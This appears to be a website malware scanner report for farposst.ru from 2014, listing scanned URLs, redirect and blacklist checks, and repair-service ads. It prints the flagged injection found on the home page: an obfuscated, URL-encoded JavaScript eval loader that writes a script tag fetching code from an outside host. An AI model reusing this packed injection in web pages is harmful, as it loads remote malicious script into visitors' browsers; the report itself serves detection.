Malware Scanner report for farposst.ru

Malicious/Suspicious/Total urls checked: 1/0/8

1 page has malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://farposst.ru/	200 OK Content-Length: 65634 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) x="%3Cscript%20type%3D%22text%2FJavaScript%22%20language%3D%22JavaScript%22%20charset%3D%22windows-1251%22%3Eeval%28function%28i%2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%20c.toString%2836%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%28c--%29%7Bd%5Bc.toString%28a%29%5D%3Dk%5Bc%5D%7C%7Cc.toString%28a%29%7Dk%3D%5Bfunction%28e%29%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Bi%3Di.replace% ... 210 bytes are skipped ...5C%22%203%3D%5C%5C%22b%2Fc%5C%5C%22%20m%22%2B%22j%3D%5C%5C%22k-l%5C%5C%22%20i%3D%5C%5C%22h%3A%2F%2Fd.e%2Ff.g%5C%5C%22%3E%3C%5C%5C%2F0%3E%22%29%3B%27%2C23%2C23%2C%27script%7Clanguage%7CJ%7Ctype%7C002124%7CavaScript%7Ctm%7Cdocument%7Cwrite%7Cids%7C2172%7Ctext%7CJavaScript%7Cmekadr%7Ccom%7Cj66%7Cphp%7Chttp%7Csrc%7Ct%7Cwindows%7C1251%7Ccharse%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%0A%3C%2Fscript%3E";x=x.replace(/æ/g,"5C");x=x.replace(/ç/g,"7C");x=x.replace(/è/g,"3D");document.write(unescape(x)); Antivirus reports: NANO-Antivirus Trojan.Script.Heuristic-js.iacgm
http://userapi.com/js/api/openapi.js?20	200 OK Content-Length: 63942 Content-Type: application/x-javascript	clean
http://stg.odnoklassniki.ru/share/odkl_share.js	200 OK Content-Length: 12312 Content-Type: application/x-javascript	clean
http://counter.rambler.ru/top100.jcn?1589395	200 OK Content-Length: 6853 Content-Type: application/x-javascript	clean
http://farposst.ru/phpBB2/recent.php	200 OK Content-Length: 1275 Content-Type: text/html	clean
http://farposst.ru/test404page.js	404 Not Found Content-Length: 289 Content-Type: text/html	clean
http://farposst.ru//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/	404 Not Found Content-Length: 318 Content-Type: text/html	clean
http://www.farposst.ru/engine/ajax/dle_ajax.js	200 OK Content-Length: 7921 Content-Type: text/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: farposst.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 16 Apr 2014 03:04:05 GMT
Pragma: no-cache
Server: Apache/2.2.26 (CentOS)
Content-Type: text/html; charset=CP1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=qohn3av7ksnb7utskd1espt662; path=/
X-Powered-By: PHP/5.3.3

Second query (visit from search engine):
GET / HTTP/1.1
Host: farposst.ru
Referer: http://www.google.com/search?q=farposst.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=farposst.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://farposst.ru/

Result: farposst.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for farposst.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools